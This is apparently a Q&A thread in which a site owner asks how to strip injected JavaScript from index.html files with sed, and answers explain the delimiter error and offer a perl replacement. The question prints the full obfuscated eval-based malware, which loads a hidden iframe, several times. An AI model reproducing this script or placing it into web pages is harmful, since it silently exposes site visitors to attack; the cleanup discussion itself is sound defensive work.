# Escape characters in shell

Tags: linux, shell, unix, sed, escaping

First off, I need to give a disclaimer:

**DO NOT RUN THIS JAVASCRIPT**

It is code that has been injected in to some of my sites by someone unscrupulous. I need to  find and replace it (with either a space or nothing). It has specifically targeted index.html and index.htm files with the exact same code in all of them.

The JavaScript is the following (again, don't run it).

```
<script>i=0;try{avasv=prototype;}catch(z){h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;587!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>
```

I need to find and replace this via a unix-like command line (I don't want to have to go through every file manually).

I have tried the following:

```
sed -i "s/<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>/ /g" *.html
```

Escaping all the double quotes, but this still throws the error:

```
sed: -e expression #1, char 2075: unknown option to `s'
```

However, I know that the s option does work, as I have previously used this to find and replace some PHP.

I have also tried the following, but to no effect either (throws the same error):

```
find . \( -name "*.html" -or -name "*.htm" \) | xargs grep -l "<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>" | xargs sed -i -e "s/<script>i=0;try{avasv=prototype;}catch(z){h=\"harCode\";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f60f58f59f73f64f62f65f64f64f66f4f66f69f77f59f73f74f70f72f63f57f59f73f4f55f74f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83'][0].split('f');v=\"e\"+\"va\";}if(v)e=window[v+\"l\"];try{q=document.createElement(\"div\");q.appendChild(q+\"\");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:\"\");for(;587!=i;i+=1){j=i;if(e)s=s+r[\"fromC\"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>/ /g"
```

What is causing this error, and how can I fix it?
I am at a loss as to what is causing that error, so any help is greatly appreciated.

Comment: I agree, and have backups of most. However, as we all know, backups are going to be out of date for (fairly) rapidly changing content, so if possible I'm looking to avoid restoring from an outdated backup.

Comment: Version control is even nicer.

Comment: Very true. Consider me scolded.

Answer (score 4, accepted):

The problem is that you're not escaping the special characters in the text, such as the `/` delimiter.

The easiest solution is to pick a different delimiter and to specify only a part of the string, for instance

```
find . -name '*.html' -o -name '*.htm' |
  xargs fgrep -l '<script>i=0;try' |
  xargs perl -i.infected -pe 's#<script>i=0;try.*?</script>##g'
```

(untested) may do the job.
(The `.*?` construct picks the shortest match; I don't know how to do that in `sed`.)

Verify with something like

```
find . -name '*.infected' | sed -e 's#.*#diff & &#' -e 's#.infected##' | sh -x
```

Comment: "Substitution replacement not terminated at -e line 1."

Comment: Aha! That just needed one more delimiter at the end. Thanks very much.

Comment: I added a `g` to change all occurrences (although there isn't likely to be more than one).

Answer (score 1):

The sed error came from the fact that the syntax for search and replace is:

```
s/text/replace/options
```

But in your text a / appears, so the get the parts test, replace and options wrong.
There is an easy solution. sed does not need to use the `/` as the delimiter between the argumens. You can use any char you want. Just pick one not appearing in your text, e.g  `#` or `%` (the first delimiter (the one after the intial s) is the delimiter he expects in the rest of the command)..

Comment: Does this mean I don't need to escape " characters? As with it quoted as it is, it gives me the error: sed: -e expression #1, char 2076: Invalid range end

Comment: My answer just addresses your delimiter problem, the " has still to be escaped. But your command just looked like they were escaped.